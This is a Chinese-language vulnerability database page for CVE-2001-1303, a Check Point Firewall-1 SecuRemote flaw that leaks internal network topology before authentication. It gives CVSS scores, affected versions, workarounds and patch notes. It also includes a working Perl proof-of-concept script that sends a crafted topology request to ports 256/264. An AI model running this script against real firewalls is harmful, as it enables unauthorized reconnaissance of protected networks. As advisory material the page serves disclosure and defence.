CVE-2001-1303
CVSS5.0
发布时间 :2001-07-18 00:00:00
修订时间 :2008-09-10 15:10:13
NMCOE    

[原文]The default configuration of SecuRemote for Check Point Firewall-1 allows remote attackers to obtain sensitive configuration information for the protected network without authentication.


[CNNVD]Check Point Firewall-1 SecureRemote网络信息泄露漏洞(CNNVD-200107-113)

        
        SecureRemote是Check Point软件设计的一个专利VPN构件,包含在某些版本的Firewall-1中。
        这个软件包存在一个安全问题,允许远程攻击者收集内部网络的信息。
        在某些旧版本中,它甚至会在通过身份验证之前就将内部网络的拓扑信息发送给连接者,这可能给攻击者进一步了解目标网络的机会。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:checkpoint:firewall-1:4.1:sp1Checkpoint Firewall-1 1 4.1 SP1
cpe:/a:checkpoint:firewall-1:4.0Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1Checkpoint Firewall-1 4.1
cpe:/a:checkpoint:firewall-1:4.1:sp2Checkpoint Firewall-1 1 4.1 SP2
cpe:/a:checkpoint:firewall-1:4.1:sp4Checkpoint Firewall-1 1 4.1 SP4
cpe:/a:checkpoint:firewall-1:4.1:sp3Checkpoint Firewall-1 1 4.1 SP3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1303
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1303
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-113
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6857.php
(VENDOR_ADVISORY)  XF  fw1-securemote-gain-information(6857)
http://www.securityfocus.com/bid/3058
(UNKNOWN)  BID  3058
http://www.securityfocus.com/archive/1/197566
(UNKNOWN)  BUGTRAQ  20010718 Firewall-1 Information leak
http://www.osvdb.org/588
(UNKNOWN)  OSVDB  588

- 漏洞信息

Check Point Firewall-1 SecureRemote网络信息泄露漏洞
中危 配置错误
2001-07-18 00:00:00 2005-05-02 00:00:00
远程  
        
        SecureRemote是Check Point软件设计的一个专利VPN构件,包含在某些版本的Firewall-1中。
        这个软件包存在一个安全问题,允许远程攻击者收集内部网络的信息。
        在某些旧版本中,它甚至会在通过身份验证之前就将内部网络的拓扑信息发送给连接者,这可能给攻击者进一步了解目标网络的机会。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用策略编辑器,取消"respond to unauthenticated topology requests"选项。
        厂商补丁:
        Check Point Software
        --------------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.checkpoint.com/techsupport/downloads/downloads.html

- 漏洞信息 (21015)

Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability (EDBID:21015)
hardware remote
2001-07-17 Verified
0 Haroon Meer & Roelof Temmingh
N/A [点击下载]
source: http://www.securityfocus.com/bid/3058/info

SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1.

A problem with the package allows remote users to gain information about internal networks. Older versions of the package send network topology information to SecureRemote connections prior to authentication, allowing an information gathering attack. 

#!/usr/bin/perl
# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com

use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IP\n";}

$port=256;
$target=inet_aton($ARGV[0]);
print "Testing $host on port $port\n";

$SENDY="410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74
636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);

if ($#results == 0) {
 print "No results on port 256 - trying 264\n";
 $port=264;
 @results2=sendraw($SENDY); 
 if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
}
# Spidermark: sensepostdata fw1
		

- 漏洞信息

588
Check Point FireWall-1 SecuRemote Internal Network Information Remote Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Check Point FireWall-1 contains a flaw that may disclose sensitive network topology information to a remote attacker. The issue is due to a flaw in the SecuRemote software which creates sessions between remote users and FW-1 modules. When a remote user connects to the system a network topology is transferred to the client, regardless of authentication.

- 时间线

2001-07-21 Unknow
2001-07-21 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: 1. Set the firewall gateway for VPN, with the "Respond to unauthenticated topology requests" enabled. 2. Set up a sample secuRemote client, and download the site topology. 3. Turn off "Respond to unauthenticated topology requests". 4. Securely distribute the file userc.C from the sample client to all secuRemote users. You will need to send out an updated userc.C any time there is a change to the encryption domain or keying info.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站